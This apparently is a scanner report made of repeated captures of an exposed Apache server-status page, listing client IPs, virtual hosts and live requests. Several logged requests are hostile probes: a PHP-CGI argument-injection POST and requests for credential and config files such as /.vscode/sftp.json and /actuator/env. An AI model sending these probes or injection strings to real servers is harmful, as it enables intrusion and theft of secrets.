0-5711719070/1/7644_ 0.071742134742610.00.03213.78 172.69.135.53h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5711719070/1/7246_ 0.041059934616470.00.03317.55 172.71.254.55h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5711719070/1/7443_ 0.03222335944190.00.00240.04 188.114.111.93h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5711717770/0/5658_ 0.001422829693960.00.00239.53 142.93.0.66http/1.1pre.relehse.com:443GET /noticias/.DS_Store HTTP/1.1 1-5711717770/0/5589_ 0.00142036216840.00.00159.58 198.41.227.124h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5711717770/0/5480_ 0.00142043980320.00.00185.17 172.71.141.191h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5711717770/0/5436_ 0.00142331155130.00.00110.80 142.93.0.66http/1.1pre.relehse.com:443GET /admin_layout/assets/img/modules/.DS_Store HTTP/1.1 1-5711717770/0/5669_ 0.00142037025250.00.00178.64 172.70.94.15h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5711717770/0/5518_ 0.00142042258610.00.00179.75 172.71.141.42h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5711717770/0/5477_ 0.001420151647730.00.00159.41 162.158.217.24h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5711717770/0/5548_ 0.00142040611500.00.00177.77 34.16.180.229http/1.1cinre.tandemhse.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5711717770/0/5479_ 0.00142067430480.00.00213.36 104.22.23.10h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5711717770/0/5691_ 0.00142041802280.00.00131.76 172.71.141.221h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/0/6258_ 0.0014229739447970.00.00295.05 108.162.246.215h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/0/6236_ 0.00142251106550130.00.00245.06 108.162.246.215h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/0/6339_ 0.0014227031584590.00.00216.40 108.162.246.215h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/0/6310_ 0.0014216287364990.00.00187.64 108.162.246.215h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/0/6270_ 0.00142037465800.00.00262.93 172.64.198.144h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/0/6410_ 0.001422901435659480.00.00241.12 104.210.140.143h2cinre-viewer.tandemhse.com:443GET /robots.txt HTTP/2.0 2-5711717750/0/6326_ 0.00142232457350.00.00277.78 142.93.0.66http/1.1pre.relehse.com:443GET /.DS_Store HTTP/1.1 2-5711717750/0/6357_ 0.0014246241460560.00.00208.42 108.162.246.215h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/0/6192_ 0.00142039422610.00.00279.73 172.64.200.148h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/0/6488W 0.000040614180.00.00203.83 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-5711717760/1/8601_ 0.0014030853007470.00.00268.32 172.69.176.152h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/0/8432_ 0.001352067003320.00.00259.80 162.158.122.178h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/0/8320_ 0.00135614131765290.00.00305.42 162.158.171.24h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/0/8479_ 0.0014230859252390.00.00265.67 172.69.68.59h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/0/8732_ 0.001422257265910.00.00294.93 188.114.111.93h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/0/8302_ 0.001422555427550.00.00251.48 188.114.111.208h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/0/8521_ 0.0014216172221670.00.00246.30 182.10.161.154http/1.1barrerasdecontencion.com:443GET /.vscode/sftp.json HTTP/1.1 3-5711717760/0/8680_ 0.0014248560423980.00.00367.18 162.158.162.156h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/0/8596_ 0.0014261257093530.00.00290.47 172.71.81.212h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/0/8495_ 0.0014234049215920.00.00246.63 172.71.115.32h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5711717740/3/5759_ 0.1110168330050.00.00243.15 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-5711717740/2/5596_ 0.084046212520.00.03156.95 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 4-5711717740/2/5790_ 0.083064102500.00.01206.96 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 4-5711717740/3/5805_ 0.093047291880.00.01213.81 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-5711717740/1/5820_ 0.061040478070.00.01156.18 146.190.63.48http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-5711717740/3/5656_ 0.08
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc873807547
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 23-Dec-2025 02:00:24 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 48 Parent Server MPM Generation: 47 Server uptime: 9 days 18 hours 56 minutes 18 seconds Server load: 0.13 0.10 0.11 Total accesses: 271932 - Total Traffic: 9.2 GB - Total Duration: 202080237 CPU Usage: u88.23 s70.81 cu1512.17 cs931.2 - .308% CPU load .322 requests/sec - 11.4 kB/second - 35.6 kB/request - 743.128 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0968394no1yes010000 1968525no0yes010000 2968393no0yes010000 3968398no2yes19001 4968392no0yes010000 Sum503 149001 _________________________________W________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-479683940/575/5815_ 33.109027259260.014.00242.79 93.174.93.12http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.0 0-479683940/587/6230_ 33.094033574630.010.29194.21 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 0-479683940/527/5792_ 33.127064874600.012.96199.90 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-479683940/546/5979_ 33.117030497230.06.80176.49 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-479683940/537/5738_ 33.1110027386820.012.56130.00 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-479683940/556/6001_ 32.94132468810240.016.01185.46 212.170.119.244h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-479683940/546/5833_ 33.091462130475750.041.45298.21 172.70.214.66h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-479683940/550/6123_ 33.114027862700.016.07178.33 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 0-479683940/542/5765_ 33.128027767670.015.81292.46 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-479683940/558/5950_ 33.0913029248290.015.58193.20 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/392/4997_ 27.846534021528920.027.15226.06 104.23.239.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/336/4930_ 27.236243023179890.05.29130.42 172.70.83.42h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/385/4841_ 27.8422020581300.011.42173.95 172.70.240.38h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/386/4814_ 27.04471219717849320.07.3296.16 172.69.70.85h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/355/4999_ 28.31624822023536710.012.66164.27 104.23.225.137h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/371/4880_ 27.6647122025522640.013.94167.96 212.170.119.244h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/381/4825_ 30.28220141559960.08.08124.35 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 1-479685250/372/4893_ 27.03471736730783580.04.36161.62 103.23.60.244http/1.1 1-479685250/387/4846_ 27.61624355321483590.08.78184.71 172.70.135.60h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/399/5017_ 28.844717033440510.09.08114.68 172.68.135.77h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/27/5384_ 11.981241031178480.00.39251.79 104.22.7.19h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/24/5325_ 12.902007097767920.00.77201.61 172.68.176.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/21/5435_ 12.3823675822588770.00.24187.76 54.36.142.130http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/24/5400_ 12.4220024677991980.00.68166.04 185.103.243.40http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 2-479683930/26/5391_ 11.972367028305530.023.13233.19 172.68.135.141h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/30/5521_ 11.1520023525865970.00.15206.28 172.68.234.64h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/28/5434_ 13.17124819121397880.01.09247.15 162.159.113.47h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-479683930/25/5452_ 9.761241030498120.00.33184.72 162.158.179.175h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-479683930/26/5306_ 13.16125120329960960.00.91226.95 162.159.113.47h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-479683930/31/5530_ 13.18124617531522310.01.00151.72 162.159.113.47h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-479683980/256/7380_ 21.101043379540.04.34245.06 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-479683980/239/7226_ 21.102057158090.03.38242.11 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-479683980/248/7056_ 21.081587121527890.03.67271.61 108.162.237.121h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-479683980/220/7184W 21.100049277840.04.58240.87 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-479683980/230/7449_ 21.102047957040.02.48228.13 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-479683980/242/7043_ 21.100045757540.07.38229.47 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-479683980/232/7258_ 21.051057969550.03.63225.04 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-479683980/207/7467_ 21.072050550010.01.53342.13 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-479683980/233/7344_ 21.081047882220.07.76242.24 172.69.70.205h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-479683980/234/7273_ 21.081039662670.016.79226.77 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 4-479683920/18/3657_ 9.3435480137672110.00.56185.09 162.158.178.22h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-479683920/17/3548_ 9.324711021941740.00.19107.48 172.71.215.211h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-479683920/27/3679_ 12.003554013712880.01.16131.15 172.69.65.122h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-479683920/27/3681_ 11.063549132872150.00.55167.37 172.71.150.219h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-479683920/28/3719_ 12.013553024649790.00.4899.29 172.71.166.137h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/r
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc8e86c3834
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 20-Dec-2025 17:58:00 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 39 Parent Server MPM Generation: 38 Server uptime: 7 days 10 hours 53 minutes 54 seconds Server load: 0.06 0.11 0.09 Total accesses: 210526 - Total Traffic: 7.6 GB - Total Duration: 143382053 CPU Usage: u17.43 s22.65 cu1233.21 cs747.38 - .314% CPU load .327 requests/sec - 12.4 kB/second - 37.9 kB/request - 681.066 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0823513no0yes010000 1823510no0yes19000 2823512no0yes010000 3823644no0yes010000 4823511no0yes010000 Sum500 149000 __________W_______________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-388235130/5/4300_ 0.3824120475350.00.01181.81 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-388235130/3/4475_ 0.3747024152330.00.01146.88 172.68.186.172h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-388235130/2/4226_ 0.355358724771950.00.03172.91 162.158.88.114h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-388235130/0/4437_ 0.004883123935830.00.00153.69 172.70.206.172h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-388235130/2/4274_ 0.3752021284640.00.01102.14 172.68.229.180h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-388235130/3/4537_ 0.3748029147440.00.03151.06 172.71.178.11h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-388235130/2/4424_ 0.3424025140750.00.00209.63 141.101.98.142h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-388235130/2/4518_ 0.3348019340250.00.00146.62 172.70.162.248h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-388235130/2/4327_ 0.3448018156140.00.00243.13 172.64.192.126h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-388235130/4/4359_ 0.3447022334750.00.01147.42 172.70.162.215h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-388235100/7/3741W 0.590016506880.00.01161.72 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-388235100/5/3626_ 0.606017373830.00.07103.80 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 1-388235100/9/3532_ 0.612014322980.00.41135.56 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-388235100/9/3577_ 0.611012363740.00.1358.66 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-388235100/6/3660_ 0.614016756580.00.01138.65 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-388235100/9/3680_ 0.594020210100.00.14135.74 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 1-388235100/9/3489_ 0.596025561850.00.2498.31 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 1-388235100/9/3652_ 0.611024268670.00.06134.88 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-388235100/9/3594_ 0.591014193720.00.08138.34 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 1-388235100/9/3769_ 0.616028308380.00.1181.73 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-388235120/2/4584_ 0.3755017043370.00.00240.13 172.70.91.180h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-388235120/3/4513_ 0.3955084001940.00.01190.17 141.101.98.214h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-388235120/3/4567_ 0.3654016254130.00.01165.89 172.69.195.232h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-388235120/3/4578_ 0.3955055361540.00.01148.83 162.158.216.150h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-388235120/2/4549_ 0.3555018763430.00.00196.73 141.101.98.16h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-388235120/2/4685_ 0.3555018046120.00.00194.49 172.64.192.10h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-388235120/3/4626_ 0.3555018506640.00.01232.84 172.70.163.139h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-388235120/1/4658_ 0.3855020884010.00.00171.26 172.68.229.111h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-388235120/3/4481_ 0.3854021018860.00.00203.44 172.71.241.57h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-388235120/1/4704_ 0.3854019771820.00.00137.91 172.68.229.74h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-388236440/9/5039_ 0.6510025019930.00.15193.79 172.70.160.224h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-388236440/13/5093_ 0.7015042121550.00.04199.12 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 3-388236440/10/4901_ 0.6420107069650.00.12225.12 172.70.160.216h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-388236440/11/4967_ 0.7113028882010.00.17164.87 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 3-388236440/5/5104_ 0.6512034973410.00.01180.26 172.68.229.198h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-388236440/11/4845_ 0.713029515840.00.17171.76 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-388236440/11/5101_ 0.653044532680.00.05187.38 172.68.229.18h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-388236440/11/5140_ 0.716033736360.00.04242.09 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-388236440/9/5063_ 0.66152528291070.00.12174.06 188.114.111.92h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-388236440/11/4992_ 0.7111024256130.00.17160.69 128.199.182.55http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 4-388235110/4/3378_ 0.36520136646270.00.21137.92 172.64.192.76h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-388235110/3/3299_ 0.3447721144120.00.01103.94 172.71.178.163h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-388235110/3/3438_ 0.3347013109340.00.00127.52 172.69.224.173h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-388235110/4/3410_ 0.3348032089240.00.01162.10 172.70.85.182h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-388235110/4/3481_ 0.3348023810330.00.0088.62 172.69.195.241h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-388235110/4/3304_ 0.3447018351140.00.0195.78 172.69.194.215h2l
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb310f155dc80f155dc817310347
Apache Status Apache Server Status for www.adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 19-Dec-2025 09:08:41 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 31 Parent Server MPM Generation: 30 Server uptime: 6 days 2 hours 4 minutes 35 seconds Server load: 0.26 0.18 0.18 Total accesses: 178816 - Total Traffic: 6.5 GB - Total Duration: 117213138 CPU Usage: u26.05 s27.32 cu994.96 cs606.44 - .315% CPU load .34 requests/sec - 12.9 kB/second - 37.9 kB/request - 655.496 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0713994no1yes19001 1713861no0yes010000 2713864no0yes010000 3713862no1yes010000 4713863no0yes010000 Sum502 149001 _________W________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-307139940/109/3799_ 6.8663016631290.06.53138.01 162.158.86.210h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-307139940/117/3932_ 6.967018359950.05.95105.27 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 0-307139940/114/3673_ 6.984022860390.04.88152.90 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-307139940/109/3899_ 6.978019121720.05.65111.37 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-307139940/111/3788_ 6.972019371520.05.2992.19 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 0-307139940/129/4051_ 6.8511625145300.06.00127.44 212.170.119.244h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-307139940/113/3921_ 6.971022323510.033.96188.87 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-307139940/111/4014_ 6.983015955760.024.91132.62 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-307139940/112/3797_ 6.981015132740.04.77204.24 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-307139940/116/3820W 6.970017245800.04.89133.23 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-307138610/3/3207_ 2.89362012949450.00.01122.20 165.225.92.153http/1.1cinre.tandemhse.com:443GET /images/email-tw.png HTTP/1.1 1-307138610/1/3071_ 2.342065513477910.00.0090.13 172.68.164.7h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/2/2999_ 2.332074110834010.00.06123.86 172.69.176.130h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/3/3044_ 2.8936208962760.00.0045.85 165.225.92.153http/1.1cinre.tandemhse.com:443GET /images/email-fb.png HTTP/1.1 1-307138610/3/3107_ 2.352070012459440.00.01126.37 162.158.108.40h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/1/3129_ 0.483572916575610.00.00108.15 67.217.228.97http/1.1pre.relehse.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/3/2965_ 2.342065021360990.00.1381.73 172.69.165.81h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/0/3099_ 0.00357187020384910.00.0093.38 67.217.228.97http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/2/3071_ 1.642074110680600.00.00127.13 172.71.124.104h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-307138610/5/3233_ 2.332074024590450.00.0671.14 162.158.88.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/2/4308_ 1.54357115453010.00.01223.59 172.70.215.95h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/1/4275_ 2.1935723182945890.00.00185.54 162.159.120.136h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-307138640/6/4283_ 2.88362014714170.00.14159.34 165.225.92.153http/1.1cinre.tandemhse.com:443GET /images/email-in.png HTTP/1.1 2-307138640/2/4331_ 2.88362054247080.00.03144.75 165.225.92.153http/1.1cinre.tandemhse.com:443GET /images/email-web.png HTTP/1.1 2-307138640/3/4266_ 2.6578776117336720.00.05188.06 172.71.126.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/3/4410_ 2.31787216727560.00.10157.60 104.23.175.203h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/2/4355_ 2.2718037917150710.00.09226.40 172.68.210.68h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/3/4399_ 2.731802019586570.00.03159.93 172.71.135.79h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-307138640/3/4232_ 2.32185019793160.00.09198.50 31.97.207.200http/1.1 2-307138640/4/4421_ 2.941852918453710.00.01131.95 172.64.192.104h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-307138620/123/3604_ 7.166013094490.00.75149.46 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-307138620/113/3689_ 7.00989825808670.01.72143.44 104.23.190.8h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-307138620/109/3498_ 7.1610090031530.012.15184.43 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-307138620/108/3472_ 7.167014547340.00.96135.53 165.227.39.235http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-307138620/109/3663_ 6.981182022652470.00.72106.71 